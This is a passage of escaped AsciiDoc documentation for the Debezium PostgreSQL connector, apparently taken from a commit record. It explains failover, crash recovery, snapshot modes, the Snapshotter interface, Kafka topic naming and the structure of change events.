connector.\nendif::community[]\n\nifdef::product[]\nThe new primary must have a replication slot that is configured for use by the `pgoutput` plug-in and the database in which you want to capture changes. Only then can you point the connector to the new server and restart the connector.\nendif::product[]\n\nThere are important caveats when failovers occur and you should pause {prodname} until you can verify that you have an intact replication slot that has not lost data. After a failover:\n\n* There must be a process that re-creates the {prodname} replication slot before allowing the application to write to the *new* primary. This is crucial. Without this process, your application can miss change events.\n\n* You might need to verify that {prodname} was able to read all changes in the slot **before the old primary failed**.\n\nOne reliable method of recovering and verifying whether any changes were lost is to recover a backup of the failed primary to the point immediately before it failed. While this can be administratively difficult, it allows you to inspect the replication slot for any unconsumed changes.\n\nifdef::community[]\n\n[NOTE]\n====\nThere are discussions in the PostgreSQL community around a feature called `failover slots` that would help mitigate this problem, but as of PostgreSQL 12, they have not been implemented. However, there is active development for PostgreSQL 13 to support logical decoding on standbys, which is a major requirement to make failover possible. You can find more about this in this link:\"https:\/\/www.postgresql.org\/message-id\/CAJ3gD9fE=0w50sRagcs+jrktBXuJAWGZQdSTMa57CCY+Dh-xbg@mail.gmail.com\"[community thread].\n\nMore about the concept of failover slots is in link:http:\/\/blog.2ndquadrant.com\/failover-slots-postgresql[this blog post].\n====\nendif::community[]\n\n[id=\"postgresql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n[id=\"postgresql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, PostgreSQL connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the PostgreSQL server's time of the event, the ID of the server transaction, and the position in the write-ahead log where the transaction changes were written. Consumers can keep track of this information, especially the LSN, to determine whether an event is a duplicate.\n\n[id=\"postgresql-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"postgresql-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the PostgreSQL WAL. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources a Kafka Connect connector can also handle very large numbers of database change events. Because of this, after being stopped for a while, when a {prodname} connector restarts, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in PostgreSQL.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-postgresql\"]\n= {prodname} connector for PostgreSQL\n\n:context: postgresql\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 9.6, 10, 11, 12 and 13 are supported.\nendif::community[]\nifdef::product[]\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 10, 11, 12 and 13 are supported.\nendif::product[]\n\nThe first time it connects to a PostgreSQL server or cluster, the connector takes a consistent snapshot of all schemas. After that snapshot is complete, the connector continuously captures row-level changes that insert, update, and delete database content and that were committed to a PostgreSQL database. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. Applications and services consume data change event records from that topic.\n\nifdef::product[]\nInformation and procedures for using a {prodname} PostgreSQL connector is organized as follows:\n\n* xref:overview-of-debezium-postgresql-connector[]\n* xref:how-debezium-postgresql-connectors-work[]\n* xref:descriptions-of-debezium-postgresql-connector-data-change-events[]\n* xref:how-debezium-postgresql-connectors-map-data-types[]\n* xref:setting-up-postgresql-to-run-a-debezium-connector[]\n* xref:deployment-of-debezium-postgresql-connectors[]\n* xref:monitoring-debezium-postgresql-connector-performance[]\n* xref:how-debezium-postgresql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} PostgreSQL connector\n\/\/ ModuleID: overview-of-debezium-postgresql-connector\n[[postgresql-overview]]\n== Overview\n\nPostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-explanation.html[_logical decoding_] feature was introduced in version 9.4. It is a mechanism that allows the extraction of the changes that were committed to the transaction log and the processing of these changes in a user-friendly manner with the help of an link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[_output plug-in_]. The output plug-in enables clients to consume the changes.\n\nThe PostgreSQL connector contains two main parts that work together to read and process database changes:\n\n[[postgresql-output-plugin]]\nifdef::community[]\n* A logical decoding output plug-in. You might need to install the output plug-in that you choose to use. You must configure a replication slot that uses your chosen output plug-in before running the PostgreSQL server. The plug-in can be one of the following:\n** link:https:\/\/github.com\/debezium\/postgres-decoderbufs[`decoderbufs`] is based on Protobuf and maintained by the {prodname} community.\n** link:https:\/\/github.com\/eulerto\/wal2json[`wal2json`] is based on JSON and maintained by the wal2json community.\n** `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. It is maintained by the PostgreSQL community, and used by PostgreSQL itself for link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present so no additional libraries need to be installed. The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the chosen logical decoding output plug-in. It uses PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_], by means of the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_]\nendif::community[]\n\nifdef::product[]\n* `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. This is the only supported logical decoding output plug-in in this {prodname} release. This plug-in is maintained by the PostgreSQL community, and used by PostgreSQL itself for link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present so no additional libraries need to be installed. The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the logical decoding output plug-in by using PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_] and the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_].\nendif::product[]\n\nThe connector produces a _change event_ for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nPostgreSQL normally purges write-ahead log (WAL) segments after some period of time. This means that the connector does not have the complete history of all changes that have been made to the database. Therefore, when the PostgreSQL connector first connects to a particular PostgreSQL database, it starts by performing a _consistent snapshot_ of each of the database schemas. After the connector completes the snapshot, it continues streaming changes from the exact point at which the snapshot was made. This way, the connector starts with a consistent view of all of the data, and does not omit any changes that were made while the snapshot was being taken.\n\nThe connector is tolerant of failures. As the connector reads changes and produces events, it records the WAL position for each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the WAL where it last left off. This includes snapshots. If the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n[[postgresql-limitations]]\n[IMPORTANT]\n====\nThe connector relies on and reflects the PostgreSQL logical decoding feature, which has the following limitations:\n\n* Logical decoding does not support DDL changes. This means that the connector is unable to report DDL change events back to consumers.\n* Logical decoding replication slots are supported on only `primary` servers. When there is a cluster of PostgreSQL servers, the connector can run on only the active `primary` server. It cannot run on `hot` or `warm` standby replicas. If the `primary` server fails or is demoted, the connector stops. After the `primary` server has recovered, you can restart the connector. If a different PostgreSQL server has been promoted to `primary`, adjust the connector configuration before restarting the connector.\n\n{link-prefix}:{link-postgresql-connector}#postgresql-when-things-go-wrong[ Behavior when things go wrong] describes what the connector does when there is a problem.\n====\n\n[IMPORTANT]\n====\n{prodname} currently supports databases with UTF-8 character encoding only.\nWith a single byte character encoding, it is not possible to correctly process strings that contain extended ASCII code characters.\n====\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-postgresql-connectors-work\n\/\/ Title: How {prodname} PostgreSQL connectors work\n[[how-the-postgresql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} PostgreSQL connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-postgresql-connectors-perform-database-snapshots[]\n* xref:how-debezium-postgresql-connectors-stream-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records[]\n* xref:metadata-in-debezium-postgresql-change-event-records[]\n* xref:debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: creating-debezium-postgresql-user\n\/\/ Title: Security for PostgreSQL connector\n[[postgresql-security]]\n=== Security\n\nTo use the {prodname} connector to stream changes from a PostgreSQL database, the connector must operate with specific privileges in the database.\nAlthough one way to grant the necessary privileges is to provide the user with `superuser` privileges, doing so potentially exposes your PostgreSQL data to unauthorized access.\nRather than granting excessive privileges to the {prodname} user, it is best to create a dedicated {prodname} replication user to which you grant specific privileges.\n\nFor more information about configuring privileges for the {prodname} PostgreSQL user, see xref:postgresql-permissions[Setting up permissions].\nFor more information about PostgreSQL logical replication security, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} PostgreSQL connectors perform database snapshots\n[[postgresql-snapshots]]\n=== Snapshots\n\nMost PostgreSQL servers are configured to not retain the complete history of the database in the WAL segments. This means that the PostgreSQL connector would be unable to see the entire history of the database by reading only the WAL. Consequently, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database. The default behavior for performing a snapshot consists of the following steps. You can change this behavior by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-snapshot-mode[`snapshot.mode` connector configuration property] to a value other than `initial`.\n\n. Start a transaction with a link:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-set-transaction.html[SERIALIZABLE, READ ONLY, DEFERRABLE] isolation level to ensure that subsequent reads in this transaction are against a single consistent version of the data. Any changes to the data due to subsequent `INSERT`, `UPDATE`, and `DELETE` operations by other clients are not visible to this transaction.\n. Obtain an `ACCESS SHARE MODE` lock on each of the tables being tracked to ensure that no structural changes can occur to any of the tables while the snapshot is taking place. These locks do not prevent table `INSERT`, `UPDATE` and `DELETE` operations from taking place during the snapshot.\n+\n_This step is omitted when `snapshot.mode` is set to `exported`, which allows the connector to perform a lock-free snapshot_.\n. Read the current position in the server's transaction log.\n. Scan the database tables and schemas, generate a `READ` event for each row and write that event to the appropriate table-specific Kafka topic.\n. Commit the transaction.\n. Record the successful completion of the snapshot in the connector offsets.\n\nIf the connector fails, is rebalanced, or stops after Step 1 begins but before Step 6 completes, upon restart the connector begins a new snapshot. After the connector completes its initial snapshot, the PostgreSQL connector continues streaming from the position that it read in step 3. This ensures that the connector does not miss any updates. If the connector stops again for any reason, upon restart, the connector continues streaming changes from where it previously left off.\n\n[WARNING]\n====\nIt is strongly recommended that you configure a PostgreSQL connector to set `snapshot.mode` to `exported`. The `initial`, `initial only` and `always` modes can lose a few events while a connector switches from performing the snapshot to streaming change event records when a database is under heavy load.\nThis is a known issue and the affected snapshot modes will be reworked to use `exported` mode internally (link:https:\/\/issues.redhat.com\/browse\/DBZ-2337[DBZ-2337]).\n====\n\n[id=\"snapshot-mode-settings\"]\n.Settings for `snapshot.mode` connector configuration property\n[cols=\"20%a,80%a\",options=\"header\"]\n|===\n|Setting\n|Description\n\n|`always`\n|The connector always performs a snapshot when it starts. After the snapshot completes, the connector continues streaming changes from step 3 in the above sequence. This mode is useful in these situations: +\n\n* It is known that some WAL segments have been deleted and are no longer available. +\n* After a cluster failure, a new primary has been promoted. The `always` snapshot mode ensures that the connector does not miss any changes that were made after the new primary had been promoted but before the connector was restarted on the new primary.\n\n|`never`\n|The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL.\n\n|`initial_only`\n|The connector performs a database snapshot and stops before streaming any change event records. If the connector had started but did not complete a snapshot before stopping, the connector restarts the snapshot process and stops when the snapshot completes.\n\n|`exported`\n|The connector performs a database snapshot based on the point in time when the replication slot was created. This mode is an excellent way to perform a snapshot in a lock-free way.\n\nifdef::community[]\n|`custom`\n|The `custom` snapshot mode lets you inject your own implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Set the `snapshot.custom.class` configuration property to the class on the classpath of your Kafka Connect cluster or included in the JAR if using the `EmbeddedEngine`. For more details, see {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].\nendif::community[]\n\n|===\n\nifdef::community[]\n[[postgresql-custom-snapshot]]\n=== Custom snapshotter SPI\n\nFor more advanced uses, you can provide an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. This interface allows control of most of the aspects of how the connector performs snapshots. This includes whether or not to take a snapshot, the options for opening the snapshot transaction, and whether to take locks.\n\nFollowing is the full API for the interface. All built-in snapshot modes implement this interface.\n\n[source,java,indent=0,subs=\"+attributes\"]\n----\n\/**\n * This interface is used to determine details about the snapshot process:\n *\n * Namely:\n * - Should a snapshot occur at all\n * - Should streaming occur\n * - What queries should be used to snapshot\n *\n * While many default snapshot modes are provided with {prodname},\n * a custom implementation of this interface can be provided by the implementor, which\n * can provide more advanced functionality, such as partial snapshots.\n *\n * Implementations must return true for either {@link #shouldSnapshot()} or {@link #shouldStream()}\n * or true for both.\n *\/\n@Incubating\npublic interface Snapshotter {\n\n void init(PostgresConnectorConfig config, OffsetState sourceInfo,\n SlotState slotState);\n\n \/**\n * @return true if the snapshotter should take a snapshot\n *\/\n boolean shouldSnapshot();\n\n \/**\n * @return true if the snapshotter should stream after taking a snapshot\n *\/\n boolean shouldStream();\n\n \/**\n *\n * @return true if streaming should resume from the start of the snapshot\n * transaction, or false for when a connector resumes and takes a snapshot,\n * streaming should resume from where streaming previously left off.\n *\/\n default boolean shouldStreamEventsStartingFromSnapshot() {\n return true;\n }\n\n \/**\n * @return true if when creating a slot, a snapshot should be exported, which\n * can be used as an alternative to taking a lock\n *\/\n default boolean exportSnapshot() {\n return false;\n }\n\n \/**\n * Generate a valid postgres query string for the specified table, or an empty {@link Optional}\n * to skip snapshotting this table (but that table will still be streamed from)\n *\n * @param tableId the table to generate a query for\n * @return a valid query string, or none to skip snapshotting this table\n *\/\n Optional<String> buildSnapshotQuery(TableId tableId);\n\n \/**\n * Return a new string that set up the transaction for snapshotting\n *\n * @param newSlotInfo if a new slow was created for snapshotting, this contains information from\n * the `create_replication_slot` command\n *\/\n default String snapshotTransactionIsolationLevelStatement(SlotCreationResult newSlotInfo) {\n \/\/ we're using the same isolation level that pg_backup uses\n return \"SET TRANSACTION ISOLATION LEVEL SERIALIZABLE, READ ONLY, DEFERRABLE;\";\n }\n\n \/**\n * Returns a SQL statement for locking the given tables during snapshotting, if required by the specific snapshotter\n * implementation.\n *\/\n default Optional<String> snapshotTableLockingStatement(Duration lockTimeout, Set<TableId> tableIds) {\n String lineSeparator = System.lineSeparator();\n StringBuilder statements = new StringBuilder();\n statements.append(\"SET lock_timeout = \").append(lockTimeout.toMillis()).append(\";\").append(lineSeparator);\n \/\/ we're locking in ACCESS SHARE MODE to avoid concurrent schema changes while we're taking the snapshot\n \/\/ this does not prevent writes to the table, but prevents changes to the table's schema....\n \/\/ DBZ-298 Quoting name in case it has been quoted originally; it doesn't do harm if it hasn't been quoted\n tableIds.forEach(tableId -> statements.append(\"LOCK TABLE \")\n .append(tableId.toDoubleQuotedString())\n .append(\" IN ACCESS SHARE MODE;\")\n .append(lineSeparator));\n return Optional.of(statements.toString());\n }\n\n \/**\n * Lifecycle hook called once the snapshot phase is finished.\n *\/\n default void snapshotCompleted() {\n \/\/ no operation\n }\n}\n----\n\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-stream-change-event-records\n\/\/ Title: How {prodname} PostgreSQL connectors stream change event records\n[[postgresql-streaming-changes]]\n=== Streaming changes\n\nThe PostgreSQL connector typically spends the vast majority of its time streaming changes from the PostgreSQL server to which it is connected. This mechanism relies on link:https:\/\/www.postgresql.org\/docs\/current\/static\/protocol-replication.html[_PostgreSQL's replication protocol_]. This protocol enables clients to receive changes from the server as they are committed in the server's transaction log at certain positions, which are referred to as Log Sequence Numbers (LSNs).\n\nWhenever the server commits a transaction, a separate server process invokes a callback function from the {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in]. This function processes the changes from the transaction, converts them to a specific format (Protobuf or JSON in the case of {prodname} plug-in) and writes them on an output stream, which can then be consumed by clients.\n\nThe {prodname} PostgreSQL connector acts as a PostgreSQL client. When the connector receives changes it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the LSN of the event. The PostgreSQL connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the PostgreSQL connector, the LSN recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. When the connector restarts, it sends a request to the PostgreSQL server to send the events starting just after that position.\n\n[NOTE]\n====\nThe PostgreSQL connector retrieves schema information as part of the events sent by the logical decoding plug-in. However, the connector does not retrieve information about which columns compose the primary key. The connector obtains this information from the JDBC metadata (side channel). If the primary key definition of a table changes (by adding, removing or renaming primary key columns), there is a tiny period of time when the primary key information from JDBC is not synchronized with the change event that the logical decoding plug-in generates. During this tiny period, a message could be created with an inconsistent key structure. To prevent this inconsistency, update primary key structures as follows:\n\n. Put the database or an application into a read-only mode.\n. Let {prodname} process all remaining events.\n. Stop {prodname}.\n. Update the primary key definition in the relevant table.\n. Put the database or the application into read\/write mode.\n. Restart {prodname}.\n====\n\n[[postgresql-pgoutput]]\n=== PostgreSQL 10+ logical decoding support (`pgoutput`)\n\nAs of PostgreSQL 10+, there is a logical replication stream mode, called `pgoutput` that is natively supported by PostgreSQL. This means that a {prodname} PostgreSQL connector can consume that replication stream\nwithout the need for additional plug-ins.\nThis is particularly valuable for environments where installation of plug-ins is not supported or not allowed.\n\nSee {link-prefix}:{link-postgresql-connector}#setting-up-postgresql[Setting up PostgreSQL] for more details.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} PostgreSQL change event records\n[[postgresql-topic-names]]\n=== Topics names\n\nThe PostgreSQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. By default, the Kafka topic name is _serverName_._schemaName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _schemaName_ is the name of the database schema where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a PostgreSQL installation that has a `postgres` database and an `inventory` schema that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. The connector would stream records to these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNow suppose that the tables are not part of a specific schema but were created in the default `public` PostgreSQL schema. The names of the Kafka topics would be:\n\n* `fulfillment.public.products`\n* `fulfillment.public.products_on_hand`\n* `fulfillment.public.customers`\n* `fulfillment.public.orders`\n\n\/\/ Type: concept\n\/\/ ModuleID: metadata-in-debezium-postgresql-change-event-records\n\/\/ Title: Metadata in {prodname} PostgreSQL change event records\n[[postgresql-meta-information]]\n=== Meta information\n\nIn addition to a {link-prefix}:{link-postgresql-connector}#postgresql-events[_database change event_], each record produced by a PostgreSQL connector contains some metadata. Metadata includes where the event occurred on the server, the name of the source partition and the name of the Kafka topic and partition where the event should go, for example:\n\n[source,json,indent=0]\n----\n \"sourcePartition\": {\n \"server\": \"fulfillment\"\n },\n \"sourceOffset\": {\n \"lsn\": \"24023128\",\n \"txId\": \"555\",\n \"ts_ms\": \"1482918357011\"\n },\n \"kafkaPartition\": null\n----\n\n* `sourcePartition` always defaults to the setting of the `database.server.name` connector configuration property.\n\n* `sourceOffset` contains information about the location of the server where the event occurred:\n\n** `lsn` represents the PostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/datatype-pg-lsn.html[Log Sequence Number] or `offset` in the transaction log.\n** `txId` represents the identifier of the server transaction that caused the event.\n** `ts_ms` represents the server time at which the transaction was committed in the form of the number of milliseconds since the epoch.\n* `kafkaPartition` with a setting of `null` means that the connector does not use a specific Kafka partition. The PostgreSQL connector uses only one Kafka Connect partition and it places the generated events into one Kafka partition.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} PostgreSQL connector-generated events that represent transaction boundaries\n[[postgresql-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"571\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"571\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"s1.a\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"s2.a\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nTransaction events are written to the topic named `_database.server.name_.transaction`.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"571\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-postgresql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} PostgreSQL connector data change events\n[[postgresql-events]]\n== Data change events\n\nThe {prodname} PostgreSQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nBy default behavior is that the connector streams change event records to {link-prefix}:{link-postgresql-connector}#postgresql-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe PostgreSQL connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-postgresql-change-events[]\n* xref:about-values-in-debezium-postgresql-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-postgresql-change-events\n\/\/ Title: About keys in {prodname} PostgreSQL change events\n[[postgresql-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created. Alternatively, if the table has `REPLICA IDENTITY` set to `FULL` or `USING INDEX` there is a field for each unique key constraint.\n\nConsider a `customers` table defined in the `public` database schema and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `PostgreSQL_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"PostgreSQL_server.public.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"name\": \"id\",\n \"index\": \"0\",\n \"schema\": {\n \"type\": \"INT32\",\n \"optional\": \"false\"\n }\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1\"\n },\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`PostgreSQL_server.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `PostgreSQL_server` is the name of the connector that generated this event. +\n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and 